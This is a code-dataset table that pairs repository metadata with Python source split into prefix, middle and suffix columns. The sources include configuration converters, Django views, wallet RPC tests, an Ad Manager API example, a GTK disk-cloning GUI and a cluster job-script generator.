repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
twobraids/configman_orginal | configman/converters.py | Python | bsd-3-clause | 8,414 | 0.00202 | # ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is configman
#
# The Initial Developer of the Original Code is
# Mozilla Foundation
# Portions created by the Initial Developer are Copyright (C) 2011
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# K Lars Lohn, lars@mozilla.com
# Peter Bengtsson, peterbe@mozilla.com
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
import sys
import re
import datetime
import types
import inspect
import datetime_util as dtu
#------------------------------------------------------------------------------
def option_value_str(an_option):
"""return an instance of Option's value as a string.
The option instance doesn't actually have to be from the Option class. All
it requires is that the passed option instance has a ``value`` attribute.
"""
if an_option.value is None:
return ''
try:
converter = to_string_converters[type(an_option.value)]
s = converter(an_option.value)
except KeyError:
if not isinstance(an_option.value, basestring):
s = unicode(an_option.value)
else:
s = an_option.value
if an_option.from_string_converter in converters_requiring_quotes:
s = "'''%s'''" % s
return s
#------------------------------------------------------------------------------
def str_dict_keys(a_dict):
"""return a modified dict where all the keys that are anything but str get
converted to str.
E.g.
>>> result = str_dict_keys({u'name': u'Peter', u'age': 99, 1: 2})
>>> # can't compare whole dicts in doctests
>>> result['name']
u'Peter'
>>> result['age']
99
>>> result[1]
2
The reason for this is that in Python <= 2.6.4 doing
``MyClass(**{u'name': u'Peter'})`` would raise a TypeError
Note that only unicode types are converted to str types.
The reason for that is you might have a class that looks like this::
class Option(object):
def __init__(self, foo=None, bar=None, **kwargs):
...
And it's being used like this::
Option(**{u'foo':1, u'bar':2, 3:4})
Then you don't want to change that {3:4} part which becomes part of
`**kwargs` inside the __init__ method.
Using integers as parameter keys is a silly example but the point is that
due to the python 2.6.4 bug only unicode keys are converted to str.
"""
new_dict = {}
for key in a_dict:
if isinstance(key, unicode):
new_dict[str(key)] = a_dict[key]
else:
new_dict[key] = a_dict[key]
return new_dict
#------------------------------------------------------------------------------
def io_converter(input_str):
""" a conversion function for to select stdout, stderr or open a file for
writing"""
if type(input_str) is str:
input_str_lower = input_str.lower()
if input_str_lower == 'stdout':
return sys.stdout
if input_str_lower == 'stderr':
return sys.stderr
return open(input_str, "w")
return input_str
#------------------------------------------------------------------------------
def timedelta_converter(input_str):
"""a conversion function for time deltas"""
if isinstance(input_str, basestring):
days, hours, minutes, seconds = 0, 0, 0, 0
details = input_str.split(':')
if len(details) >= 4:
days = int(details[-4])
if len(details) >= 3:
hours = int(details[-3])
if len(details) >= 2:
minutes = int(details[-2])
if len(details) >= 1:
seconds = int(details[-1])
return datetime.timedelta(days=days,
hours=hours,
minutes=minutes,
seconds=seconds)
raise ValueError(input_str)
#------------------------------------------------------------------------------
def boolean_converter(input_str):
""" a conversion function for boolean
"""
return input_str.lower() in ("true", "t", "1", "y", "yes")
#------------------------------------------------------------------------------
import __builtin__
_all_named_builtins = dir(__builtin__)
def class_converter(input_str):
""" a conversion that will import a module and class name
"""
if not input_str:
return None
if '.' not in input_str and input_str in _all_named_builtins:
return eval(input_str)
parts = input_str.split('.')
try:
# first try as a complete module
package = __import__(input_str)
except ImportError:
# it must be a class from a module
package = __import__('.'.join(parts[:-1]), globals(), locals(), [])
obj = package
for name in parts[1:]:
obj = getattr(obj, name)
return obj
#------------------------------------------------------------------------------
def regex_converter(input_str):
re | turn re.compile(input_str)
compiled_regexp_type = type(re.compile(r'x'))
#------------------------------------------------------------------------------
from_string_converters = {int: int,
| float: float,
str: str,
unicode: unicode,
bool: boolean_converter,
datetime.datetime: dtu.datetime_from_ISO_string,
datetime.date: dtu.date_from_ISO_string,
datetime.timedelta: timedelta_converter,
type: class_converter,
types.FunctionType: class_converter,
compiled_regexp_type: regex_converter,
}
#------------------------------------------------------------------------------
def py_obj_to_str(a_thing):
if a_thing is None:
return ''
if inspect.ismodule(a_thing):
return a_thing.__name__
if a_thing.__module__ == '__builtin__':
return a_thing.__name__
if a_thing.__module__ == "__main__":
return a_thing.__name__
return "%s.%s" % (a_thing.__module__, a_thing.__name__)
#------------------------------------------------------------------------------
to_string_converters = {int: str,
float: str,
str: str,
unicode: unicode,
bool: lambda x: 'True' if x else 'False',
datetime.datetime: dtu.datetime_to_ISO_string,
datetime.date: dtu.date_to_ISO_string,
datetime.timedelta: dtu.timedelta_to_str,
type: py_obj_to_str,
types.FunctionType: py_obj_to_str,
compiled_regexp_type: lambda x: x. |
mesemus/fedoralink | fedoralink/views.py | Python | apache-2.0 | 15,936 | 0.002322 | import inspect
import requests
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.http import HttpResponseRedirect, FileResponse, Http404, HttpResponse
from django.shortcuts import render
from django.template import Template, RequestContext
from django.utils.translation import ugettext as _
from django.views.generic import View, CreateView, DetailView, UpdateView
from fedoralink.forms import FedoraForm
from fedoralink.indexer.models import IndexableFedoraObject
from fedoralink.models import FedoraObject
from fedoralink_ui.templatetags.fedoralink_tags import id_from_path
from fedoralink_ui.models import ResourceType
from .utils import get_class, fullname
class GenericGetView():
def getChildTemplate(self, type, templateType):
# TODO: more templates
if templateType == 'edit' or templateType == 'create':
return FedoraObject.objects.filter(
pk=type.templates_edit[0]).get()
if templateType == 'view':
return FedoraObject.objects.filter(
pk=type.templates_view[0]).get()
def get(self, rdf_meta, templateType):
for rdf_type in rdf_meta:
retrieved_type = list(ResourceType.objects.filter(rdf_types=rdf_type))
if retrieved_type: break
template_url = None
for type in retrieved_type:
if ('type/' in type.id):
child = self.getChildTemplate(type=type, templateType=templateType)
for template in child.children:
template_url = template.id
return template_url
class GenericIndexView(View):
app_name = None
def get(self, request):
return HttpResponseRedirect(reverse(self.app_name + ':rozsirene_hledani', kwargs={'parametry': ''}))
# noinspection PyUnresolvedReferences
class Fedor | aTemplateMixin:
def get_template_names(self):
if self.object:
templates = [fullname(x).replace('.', '/') + '/_' + self.template_type + '.html'
for x in inspect.getmro(type(self.object))]
templates. | append(self.template_name)
return templates
return super().get_template_names()
class GenericDownloadView(View):
model = None
def get(self, request, bitstream_id):
attachment = self.model.objects.get(pk=bitstream_id.replace('_', '/'))
bitstream = attachment.get_bitstream()
resp = FileResponse(bitstream.stream, content_type=bitstream.mimetype)
resp['Content-Disposition'] = 'inline; filename="' + attachment.filename
return resp
class GenericChangeStateView(View):
model = None
def post(self, request, pk):
raise Exception("Not implemented yet ...")
class GenericIndexerView(View):
model = FedoraObject
template_name = 'fedoralink_ui/indexer_view.html'
list_item_template = 'fedoralink_ui/indexer_resource_view.html'
orderings = ()
default_ordering = ''
facets = None
title = None
create_button_title = None
# noinspection PyCallingNonCallable
def get(self, request, parametry):
if isinstance(self.model, str):
self.model = get_class(self.model)
if self.facets and callable(self.facets):
requested_facets = self.facets(request, parametry)
else:
requested_facets = self.facets
requested_facet_ids = [x[0] for x in requested_facets]
data = self.model.objects.all()
if requested_facets:
data = data.request_facets(*requested_facet_ids)
if 'searchstring' in request.GET and request.GET['searchstring'].strip():
data = data.filter(solr_all_fields=request.GET['searchstring'].strip())
for k in request.GET:
if k.startswith('facet__'):
values = request.GET.getlist(k)
k = k[len('facet__'):]
q = None
for v in values:
if not q:
q = Q(**{k: v})
else:
q |= Q(**{k: v})
if q:
data = data.filter(q)
sort = request.GET.get('sort', self.default_ordering or self.orderings[0][0])
if sort:
data = data.order_by(*[x.strip() for x in sort.split(',')])
page = request.GET.get('page')
paginator = Paginator(data, 10)
try:
page = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
page = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
page = paginator.page(paginator.num_pages)
return render(request, self.template_name, {
'page': page,
'data': data,
'item_template': self.list_item_template,
'facet_names': {k: v for k, v in requested_facets},
'searchstring': request.GET.get('searchstring', ''),
'orderings': self.orderings,
'ordering': sort,
'title': self.title,
'create_button_title': self.create_button_title
})
class GenericLinkTitleView(DetailView, FedoraTemplateMixin):
prefix = None
template_name = None
def get_queryset(self):
return FedoraObject.objects.all()
def get_object(self, queryset=None):
pk = self.prefix + self.kwargs.get(self.pk_url_kwarg, None).replace("_", "/")
self.kwargs[self.pk_url_kwarg] = pk
retrieved_object = super().get_object(queryset)
if not isinstance(retrieved_object, IndexableFedoraObject):
raise Exception("Can not use object with pk %s in a generic view as it is not of a known type" % pk)
return retrieved_object
class GenericLinkView(View):
model = FedoraObject
template_name = 'fedoralink/link_view.html'
base_template = 'please_set_base_template_for_generic_link_view'
list_item_template = 'please_set_item_template_for_generic_link_view'
orderings = ()
default_ordering = ''
facets = None
title = None
create_button_title = None
# noinspection PyCallingNonCallable
def get(self, request, parametry):
if isinstance(self.model, str):
self.model = get_class(self.model)
if self.facets and callable(self.facets):
requested_facets = self.facets(request, parametry)
else:
requested_facets = self.facets
requested_facet_ids = [x[0] for x in requested_facets]
data = self.model.objects.all()
if requested_facets:
data = data.request_facets(*requested_facet_ids)
if 'searchstring' in request.GET and request.GET['searchstring'].strip():
data = data.filter(solr_all_fields=request.GET['searchstring'].strip())
for k in request.GET:
if k.startswith('facet__'):
values = request.GET.getlist(k)
k = k[len('facet__'):]
q = None
for v in values:
if not q:
q = Q(**{k: v})
else:
q |= Q(**{k: v})
if q:
data = data.filter(q)
sort = request.GET.get('sort', self.default_ordering or self.orderings[0][0])
if sort:
data = data.order_by(*[x.strip() for x in sort.split(',')])
page = request.GET.get('page')
paginator = Paginator(data, 10)
try:
page = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
page = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
page = paginator.page(paginator.num_pages)
return render(request, self.template_name, {
'page': page,
'data': data,
'base_template': self.base_template,
'item_template': self |
PointyShinyBurning/cpgintegrate | cpgintegrate/airflow/__init__.py | Python | agpl-3.0 | 788 | 0.005076 | from airflow import DAG
from cpgintegrate.airflow.cpg_airflow_plugin import CPGDatasetToXCom, XComDatasetToCkan
def dataset_list_subdag(dag_id, start_date, connector_class, connection_id, | ckan_connection_id, ckan_package_id, pool,
dataset_list):
subdag = DAG(dag_id, start_date=start_date)
with subdag as dag:
for d | ataset in dataset_list:
pull = CPGDatasetToXCom(task_id=dataset, connector_class=connector_class, connection_id=connection_id,
dataset_args=[dataset], pool=pool)
push = XComDatasetToCkan(task_id=dataset + '_ckan_push',
ckan_connection_id=ckan_connection_id, ckan_package_id=ckan_package_id)
pull >> push
return subdag
|
TeskeVirtualSystem/CloneInterface | clone.py | Python | gpl-2.0 | 8,341 | 0.031066 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################
# _______ ______ #
# |_ _\ \ / / ___| #
# | | \ \ / /\___ \ #
# | | \ V / ___) | #
# |_| \_/ |____/ #
# #
###################################
# TVS DClone Tool #
# Version 1.0 #
# By: Teske Virtual Systems #
# This tool is release under #
# GPL license, for more #
# details see license.txt file #
###################################
# http://www.teske.net.br #
###################################
import commands
import subprocess
import re
import threading
import signal
import signal
import sys
import os
import gtk
import time
import urllib
import cgi
import math
from simplejson import dumps as to_json
from simplejson import loads as from_json
from webgui import start_gtk_thread
from webgui import launch_browser
from webgui import synchronous_gtk_message
from webgui import asynchronous_gtk_message
from webgui import kill_gtk_thread
disks = []
def LoadDisks():
global disks
x = commands.getstatusoutput("gksudo -D \"DClone Tool\" ./utils.sh")
if x[0] != 0 and x[0] != 256:
print "Este aplicativo precisa das permissões de administrador para funcionar!"
label = gtk.Label("Este aplicativo precisa de permissões de administrador para funcionar.")
dialog = gtk.Dialog("DClone Tool", None, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT, (gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))
dialog.vbox.pack_start(label)
label.show()
dialog.run()
dialog.destroy()
sys.exit(1)
dk = commands.getoutput("sudo ./utils.sh -g")
dk = dk.split(',')
for disk in dk:
dsk = commands.getoutput("sudo ./utils.sh -s "+disk)
model = commands.getoutput("sudo ./utils.sh -m "+disk)
dsk = dsk.split(' ')
print dsk
if dsk[1] == 'GB':
dsk[0] = float(dsk[0].replace(",",".")) * 1000
elif dsk[1] == 'KB':
dsk[0] = float(dsk[0].replace(",",".")) / 1000
else:
dsk[0] = float(dsk[0].replace(",","."))
dpk = (disk,dsk[0],model)
disks.append(dpk)
def buffered(f):
a = []
while True:
c = f.read(1)
if c == '':
break
elif c == '\r':
yield ''.join(a)
a = []
else:
a.append(c)
class dcfldd:
LINE_MATCH = re.compile(r'\[(.*)\% of (.*)Mb\] (.*) blocks \((.*)Mb\) written. (.*) remaining')
def __init__(self, diskfrom, diskto, totalsize):
global started_copy
if not started_copy:
cmdline = ['/usr/bin/sudo', '/usr/bin/dcfldd', 'sizeprobe=if', 'if='+diskfrom, 'of='+diskto]
print "Iniciando copia de "+diskfrom+" para "+diskto+" no total de "+str(totalsize)+" Mb"
self.process = subprocess.Popen(cmdline, stderr=subprocess.PIPE)
self.thread = threading.Thread(target=self.watch, args=[self.process.stderr])
self.thread.start()
started_copy = True
self.total = totalsize
def kill(self):
os.kill(self.process.pid, signal.SIGINT)
def watch(self, f):
global web_send
for line in buffered(f):
result = self.LINE_MATCH.match(line)
if result:
result = result.groups()
percent = result[0]
self.total = result[1]
mb = result[3]
time = result[4]
sys.stdout.write('%s Mb / %s Mb (%s%% restantes)\r' % (mb, self.total, percent))
sys.stdout.flush()
web_send('updateProgress('+str(mb)+','+str(self.total)+', "'+time+'");');
class Global(object):
quit = False
@classmethod
def set_quit(cls, *args, **kwargs):
cls.quit = True
def nl2br(string, is_xhtml= True ):
if is_xhtml:
return string.replace('\n','<br />')
else :
return string.replace('\n','<br>')
def main():
global disks
global browser
global web_send
global started_copy
global dcfprocess
global window
dcfprocess = None
start_gtk_thread()
started_copy = False
file = os.path.abspath('page.html')
uri = 'file://' + urllib.pathname2url(file)
browser, web_recv, web_send, window = synchronous_gtk_message(launch_browser)(uri,quit_function=Global.set_quit,echo=False,width=640,height=640)
browser.connect("navigation-requested", on_navigation_requested)
while not Global.quit:
time.sleep(1)
def ProcessDiskData(line):
linedata = line.split(None,6)
while len(linedata) < 7:
linedata.append('')
return linedata
def ProcessType(type):
return cgi.escape(type.replace('primary',"Primária").replace('extended',"Extendida").replace('logic',"Lógica"))
def BuildDiskDataHTML(data,disk):
diskdata = GetLoadedDiskData(disk)
base = 'Modelo: '+cgi.escape(diskdata[2])+'<BR>Tamanho total: '+str(diskdata[1])+' MB<BR><center><table width="502" border="0" cellpadding="0" cellspacing="0" style="color: | #FFFFFF"> \
<tr> \
<th width="34" height="19" valign="top">ID</td> \
<th width="93" valign="top">Tamanho</td> \
<th width="106" valign="top">Tipo</td> \
<th width="160" valign="top">Sistema de Arquivos </td> \
<th width="109" valign="top">Sinalizador</td> \
</tr> '
dk = data.split('\ | n')
for line in dk:
id, inicio, fim, tamanho, tipo, fs, sig = ProcessDiskData(line)
base += '<tr><td height="19" valign="top"><center>'+id+'</center></td><td valign="top"><center>'+tamanho+'</center></td><td valign="top"><center>'+ ProcessType(tipo)+'</center></td><td valign="top"><center>'+fs.upper()+'</center></td><td valign="top"><center>'+sig+'</center></td></tr>'
base += '</table></center>'
return base.replace('\n','')
def OpenSaveFile():
global window
filename = None
chooser = gtk.FileChooserDialog("Salvar imagem", window, gtk.FILE_CHOOSER_ACTION_SAVE, (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_SAVE, gtk.RESPONSE_OK))
response = chooser.run()
if response == gtk.RESPONSE_OK: filename = chooser.get_filename()
chooser.destroy()
return filename
def OpenLoadFile():
global window
filename = None
chooser = gtk.FileChooserDialog("Abrir imagem", None ,gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
chooser.set_default_response(gtk.RESPONSE_OK)
chooser.set_modal(False)
response = chooser.run()
if response == gtk.RESPONSE_OK:
filename = chooser.get_filename()
chooser.destroy()
return filename
def GetLoadedDiskData(disk):
global disks
for dsk in disks:
if dsk[0] == disk:
return dsk
return (None,None,None)
def on_navigation_requested(view, frame, req, data=None):
global dcfprocess
uri = req.get_uri()
scheme, function, data =uri.split(':', 2)
if scheme == 'callback':
print uri
if function == '//loaddisks':
for disk in disks:
web_send('addDisk(\''+disk[0]+'\',\''+disk[2]+'\');');
#web_send('addDisk(\'RAW\',\'Arquivo\');');
elif function == '//loaddiskdata':
data = data.split(':')
disk_data = commands.getoutput("sudo ./utils.sh -d "+data[1])
#html_data = nl2br(cgi.escape(disk_data))
html_data = BuildDiskDataHTML(disk_data,data[1])
if data[0] == 'origem':
web_send('setDisk(\''+html_data+'\',true)');
else:
web_send('setDisk(\''+html_data+'\',false)');
elif function == '//startclone':
data = data.split(':')
origindata = GetLoadedDiskData(data[1])
print "Disco Origem: "
print origindata
destindata = GetLoadedDiskData(data[2])
print "Disco Destino: "
print destindata
print "Iniciando dcfldd para /dev/null"
dcfprocess = dcfldd(data[1],data[2], origindata[1])
elif function == '//selectfilesource':
filename = OpenLoadFile()
print filename
if not filename == None:
web_send('addDiskOrg(\''+filename+'\',\'RAW\');');
elif function == '//selectfiledestiny':
filename = OpenSaveFile()
print filename
if not filename == None:
web_send('addDiskDest(\''+filename+'\',\'RAW\');');
elif function == '//exit':
sys.exit(0)
return True
else:
return False
def my_quit_wrapper(fun):
signal.signal(signal.SIGINT, Global.set_quit)
def fun2(*args, **kwargs):
try:
x = fun(*args, **kwargs) # equivalent to "apply"
finally:
kill_gtk_thread()
Global.set_quit()
if dcfprocess != None:
dcfprocess.kill()
|
ionomy/ion | test/functional/wallet-accounts.py | Python | mit | 5,217 | 0.00345 | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Copyright (c) 2018-2020 The Ion Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test account RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount
- listaddressgroupings
- setaccount
- sendfrom (with account arguments)
- move (with account arguments)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class WalletAccountsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [["-paytxfee=0.0001"]]
def run_test(self):
node = self.nodes[0]
# Check that there's no UTXO on any of the nodes
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/500 each
node.generate(1)
node.generate(101)
assert_equal(node.getbalance(), 10875000.00000000)
# there should be 2 address groups
# each with 1 address with a balance of 500 Ion
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 102)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
for address_group in address_groups:
assert_equal(len(address_group), 1)
assert_equal(len(address_group[0]), 2)
#assert_equal(address_group[0][1], 0.00000000)
linked_addresses.add(address_group[0][0])
# send 500 from each address to a third address not in this wallet
# There's some fee that will come back to us when the miner reward
# matures.
common_address = "gRd8PtjGrSRA8vrASoUz66wu6zsUBW9FX9"
txid = node.sendmany(
fromaccount="",
amounts={common_address: 1000},
minconf=1,
addlocked=False,
comment="",
subtractfeefrom=[common_address],
)
tx_details = node.gettransaction(txid)
fee = -tx_details['details'][0]['fee']
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 102)
assert_equal(len(address_groups[0]), 1)
#assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
#assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" account has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
node.sendfrom("", common_address, fee)
accounts = ["a", "b", "c", "d", "e"]
amount_to_send = 1.0
account_addresses = dict()
for account in accounts:
address = node.getaccountaddress(account)
account_addresses[account] = address
node.getnewaddress(account)
assert_equal(node.getaccount(address), account)
assert(address in node.getaddressesbyaccount(account))
node.s | endfrom("", address, amount_to_send)
node.generate(1)
for i in range(len(accounts)):
from_account = acco | unts[i]
to_account = accounts[(i+1) % len(accounts)]
to_address = account_addresses[to_account]
node.sendfrom(from_account, to_address, amount_to_send)
node.generate(1)
for account in accounts:
address = node.getaccountaddress(account)
assert(address != account_addresses[account])
assert_equal(node.getreceivedbyaccount(account), 2)
node.move(account, "", node.getbalance(account))
node.generate(51)
expected_account_balances = {"": 17624000.00000000}
for account in accounts:
expected_account_balances[account] = 0
assert_equal(node.listaccounts(), expected_account_balances)
assert_equal(node.getbalance(""), 17624000.00000000)
for account in accounts:
address = node.getaccountaddress("")
node.setaccount(address, account)
assert(address in node.getaddressesbyaccount(account))
assert(address not in node.getaddressesbyaccount(""))
for account in accounts:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, account)
node.sendfrom("", multisig_address, 50)
node.generate(51)
for account in accounts:
assert_equal(node.getbalance(account), 50)
if __name__ == '__main__':
WalletAccountsTest().main()
|
CyberReboot/vcontrol | tests/test_rest_providers_remove.py | Python | apache-2.0 | 2,487 | 0.00201 | """ Test for t | he remove.py module in the vcontrol/rest/providers directory """
from os import remove as delete_file
from web import threadeddict
from vcontrol.rest.providers import remove
PROVIDERS_FILE_PATH = "../vcontrol/rest/providers/providers.txt"
class ContextDummy():
env = threadeddict()
env['HTTP_HOST'] = 'localhost:8080'
class WebDummy():
# dummy class to emulate the web.ctx.env call in remove.py
ctx = ContextDummy()
def tes | t_successful_provider_removal():
""" Here we give the module a text file with PROVIDER: written in it,
it should remove that line in the file """
remove_provider = remove.RemoveProviderR()
remove.web = WebDummy() # override the web variable in remove.py
test_provider = "PROV"
expected_providers_contents = ['What:\n', 'Test:'] # what we expect to see in providers.txt after we call GET
# create the file
with open(PROVIDERS_FILE_PATH, 'w') as f:
f.writelines([
"What:",
"\n",
test_provider + ":",
"\n",
"Test:"
])
assert remove_provider.GET(test_provider) == "removed " + test_provider
# read the file and see if it has removed the line with the test_provider
with open(PROVIDERS_FILE_PATH, 'r') as f:
provider_contents = f.readlines()
delete_file(PROVIDERS_FILE_PATH) # delete the file
assert provider_contents == expected_providers_contents
def test_unsuccessful_provider_removal():
""" Here we give the module a text file without the provider written in it,
it should tell us that it couldn't find the provider we gave it as an argument"""
remove_provider = remove.RemoveProviderR()
remove.web = WebDummy() # override the web variable in remove.py
test_provider = "PROV"
expected_providers_contents = ['What:\n', 'NOTPROV:\n', 'Test:'] # what we expect to see in providers.txt after GET
# create the file
with open(PROVIDERS_FILE_PATH, 'w') as f:
f.writelines([
"What:",
"\n",
"NOTPROV:",
"\n",
"Test:"
])
assert remove_provider.GET(test_provider) == test_provider + " not found, couldn't remove"
# read the file and see if it's the same
with open(PROVIDERS_FILE_PATH, 'r') as f:
provider_contents = f.readlines()
delete_file(PROVIDERS_FILE_PATH) # delete the file
assert provider_contents == expected_providers_contents
|
jiadaizhao/LeetCode | 0101-0200/0131-Palindrome Partitioning/0131-Palindrome Partitioning.py | Python | mit | 711 | 0.002813 | class Solution:
def partition(self, s: str) -> List[List[str]]:
palindrome = [[False]*len(s) for _ in | range(len(s))]
for j in range(len(s)):
for i in range(j + 1):
if s[i] == s[j] and (j - i < 2 or palindrome[i+1][j-1]):
palindrome[i][j] = True
result = []
path = []
def dfs(start):
if start == len(s):
result.append(path[:])
return
for i in range(start, len(s)):
if palindrome[start][i]:
path.append(s[start:i+1])
| dfs(i + 1)
path.pop()
dfs(0)
return result
|
googleads/googleads-python-lib | examples/ad_manager/v202111/activity_group_service/update_activity_groups.py | Python | apache-2.0 | 2,745 | 0.0051 | #!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by appli | cable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CON | DITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example updates activity groups.
To determine which activity groups exist, run get_all_activity_groups.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the ID of the activity group and the company to update it with.
ACTIVITY_GROUP_ID = 'INSERT_ACTIVITY_GROUP_ID_HERE'
ADVERTISER_COMPANY_ID = 'INSERT_ADVERTISER_COMPANY_ID_HERE'
def main(client, activity_group_id, advertiser_company_id):
# Initialize appropriate service.
activity_group_service = client.GetService('ActivityGroupService',
version='v202111')
# Create statement object to select a single activity groups by ID.
statement = (ad_manager.StatementBuilder(version='v202111')
.Where('id = :activityGroupId')
.WithBindVariable('activityGroupId', int(activity_group_id))
.Limit(1))
# Get activity groups by statement.
response = activity_group_service.getActivityGroupsByStatement(
statement.ToStatement())
if 'results' in response and len(response['results']):
updated_activity_groups = []
for activity_group in response['results']:
activity_group['companyIds'].append(advertiser_company_id)
updated_activity_groups.append(activity_group)
# Update the activity groups on the server.
activity_groups = activity_group_service.updateActivityGroups(
updated_activity_groups)
for activity_group in activity_groups:
print(('Activity group with ID "%s" and name "%s" was updated.')
% (activity_group['id'], activity_group['name']))
else:
print('No activity groups found to update.')
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, ACTIVITY_GROUP_ID, ADVERTISER_COMPANY_ID)
|
sjpfenninger/sandpile | sandpile/cluster.py | Python | mit | 4,792 | 0.000626 | """
Run on cluster
"""
import argparse
import os
import itertools
import networkx as nx
import pandas as pd
from . import compare_cases
def generate_run(graph, iterations, epsilon_control, epsilon_damage,
out_dir, nodes=None, mem=6000, runtime=120, activate=''):
"""
Generate bash scripts for an array run in qsub/bsub cluster environments
``graph`` (string): can be either "regular", "scalefree", or the
path to a GraphML file.
``nodes`` must be given if graph is regular or scalefree.
Other default parameters as specified in the corresponding ``run_``
functions in compare_cases.py are used, and cannot be overriden here.
``activate`` (string): additional commands to execute before calling
sandpile (e.g. activating a virtualenv)
"""
if graph == 'regular' or graph == 'scalefree':
assert nodes is not None
runs = [i for i in itertools.product(epsilon_control, epsilon_damage)]
name = out_dir.replace("/", "_")
df_runs = pd.DataFrame(runs, columns=['epsilon_control', 'epsilon_damage'])
df_runs.to_csv(os.path.join(out_dir, 'iterations.csv'))
strings = ['#!/bin/sh\ncase "$1" in\n']
for index, run in enumerate(runs):
e1, ed = run
if nodes:
nodes_string = '--nodes={}'.format(nodes)
else:
nodes_string = ''
run_string = ('{idx}) {act}\n'
'sandpile {idx} {G} {i} {e1} {ed} {nodes}\n'
';;\n'.format(idx=index + 1,
G=graph, i=iterations,
e1=e1, ed=ed,
nodes=nodes_string,
act=activate))
strings.append(run_string)
strings.append('esac')
bsub_run_str = ('#!/bin/sh\n'
'#BSUB -J {name}[1-{to}]\n'
'#BSUB -R "rusage[mem={mem}]"\n'
'#BSUB -n 1\n'
| '#BSUB -W {runtime}\n'
'#BSUB -o logs/run_%I.log\n\n'.format(name=name,
to=index + 1,
mem=mem,
runtime=runtime))
bsub_run_str += './array_run.sh ${ | LSB_JOBINDEX}\n'
qsub_run_str = ('#!/bin/sh\n'
'#$ -t 1-{to}\n'
'#$ -N {name}\n'
'#$ -j y -o logs/run_$TASK_ID.log\n'
'#$ -l mem_total={mem:.1f}G\n'
'#$ -cwd\n'.format(name=name, to=index + 1,
mem=mem / 1000))
qsub_run_str += './array_run.sh ${SGE_TASK_ID}\n'
with open(os.path.join(out_dir, 'array_run.sh'), 'w') as f:
for l in strings:
f.write(l + '\n')
with open(os.path.join(out_dir, 'run_bsub.sh'), 'w') as f:
f.write(bsub_run_str + '\n')
with open(os.path.join(out_dir, 'run_qsub.sh'), 'w') as f:
f.write(qsub_run_str + '\n')
with open(os.path.join(out_dir, 'prep.sh'), 'w') as f:
f.write('chmod +x *.sh\n')
f.write('mkdir logs\n')
f.write('mkdir results\n')
def main():
parser = argparse.ArgumentParser(description='Run model.')
parser.add_argument('run_id', metavar='run_id', type=int)
parser.add_argument('graph', metavar='graph', type=str)
parser.add_argument('iterations', metavar='iterations', type=int)
parser.add_argument('epsilon_control', metavar='epsilon_control', type=float)
parser.add_argument('epsilon_damage', metavar='epsilon_damage', type=float)
parser.add_argument('--nodes', metavar='nodes', type=int)
